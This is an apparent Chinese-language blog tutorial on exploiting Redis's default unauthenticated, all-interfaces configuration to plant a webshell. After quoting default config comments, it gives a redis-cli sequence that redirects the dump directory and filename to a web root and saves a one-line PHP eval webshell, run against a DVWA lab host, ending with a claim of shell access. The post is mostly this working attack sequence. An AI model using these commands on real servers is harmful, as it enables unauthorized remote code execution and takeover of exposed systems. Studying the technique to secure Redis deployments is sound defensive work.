Redis For Webshell

2019-08-14  本文已影响0人  RabbitMask

安全性(未授权访问)

其实在《Redis初步》中我们也提到了,redis默认是不会设置密码的,我们来分析下默认的conf文件来探究下它初始的安全性。

首先是密码,默认并未设置,需要requirepass password手动指定,如果是自定义的conf文件,在redis-server命令启动时为指定配置文件,同样不会生效。

# Require clients to issue AUTH <PASSWORD> before processing any other
# commands.  This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
# 
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
# requirepass foobared

其次是访问策略,默认是完全放开的0.0.0.0访问机制。

# By default Redis listens for connections from all the network interfaces
# available on the server. It is possible to listen to just one or multiple
# interfaces using the "bind" configuration directive, followed by one or
# more IP addresses.
#
# Examples:
#
# bind 192.168.1.100 10.0.0.1
# bind 127.0.0.1

以上两条,便是网上广为流传的redis未授权访问漏洞成因,算漏洞么?算吧、但一切却又合情合理。

写权限(Get Webshell)

我们继续查看配置文件,dbfilename即导出的文件名称,这里当然默认为rdb文件,即在save操作时生成的存储文件。

# The filename where to dump the DB
dbfilename dump.rdb

dir 即“工作路径”,也就是上面提到的存储文件save的位置,这里默认为redis的根目录,如果我们设置为自定义的绝对路径自然是完全可行的。

# The working directory.
#
# The DB will be written inside this directory, with the filename specified
# above using the 'dbfilename' configuration directive.
# 
# The Append Only File will also be created inside this directory.
# 
# Note that you must specify a directory here, not a file name.
dir ./

最后呢,redis还有一个机制,可以通过config命令在控制台对上述参数进行set,虽说并不会更改conf文件,仅对此次redis生效,redis重启失效,但是!正是因为这种机制,导致我们的config set无需重启redis即可生效,那么,啰嗦完了,开始吧~

#redis-cli
192.168.1.254:6379> config set dir D:\Software\Phpstudy\PHPTutorial\WWW\DVWA
OK
192.168.1.254:6379> config set dbfilename rabbit.php
OK
192.168.1.254:6379> set webshell "<?php eval(@$_POST['a']);?>"
OK
192.168.1.254:6379> save
OK

#redis-server
[20424] 14 Aug 14:21:54.207 * DB saved on disk

成功在指定目录生成文件:

可正常解析,getshell success:

上一篇下一篇

猜你喜欢

热点阅读